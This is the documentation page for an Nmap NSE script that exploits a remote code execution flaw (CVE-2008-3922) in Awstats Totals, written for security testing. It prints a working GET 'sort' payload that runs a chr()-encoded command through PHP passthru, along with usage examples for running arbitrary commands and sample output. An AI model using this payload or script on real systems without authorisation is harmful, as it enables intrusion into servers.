Script http-awstatstotals-exec
Script types:
portrule
Categories:
vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-awstatstotals-exec.nse
Script Summary
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
This vulnerability can be exploited through the GET variable sort.
The script queries the web server with the command payload encoded using PHP's
chr() function:
?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
Common paths for Awstats Total:
/awstats/index.php/awstatstotals/index.php/awstats/awstatstotals.php
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
- http://www.exploit-db.com/exploits/17324/
Script Arguments
- http-awstatstotals-exec.uri
Awstats Totals URI including path. Default: /index.php
- http-awstatstotals-exec.cmd
Command to execute. Default: whoami
- http-awstatstotals-exec.outfile
Output file. If set it saves the output in this file.
Other useful args when running this script: http.useragent - User Agent to use in GET request
- slaxml.debug
See the documentation for the slaxml library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
Example Usage
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target> nmap -sV --script http-awstatstotals-exec.nse <target>
Script Output
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-awstatstotals-exec.nse: |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Requires
Author:
License: Same as Nmap--See https://nmap.org/book/man-legal.html
action
- action (host, port)
-
MAIN
Parameters
- host
- port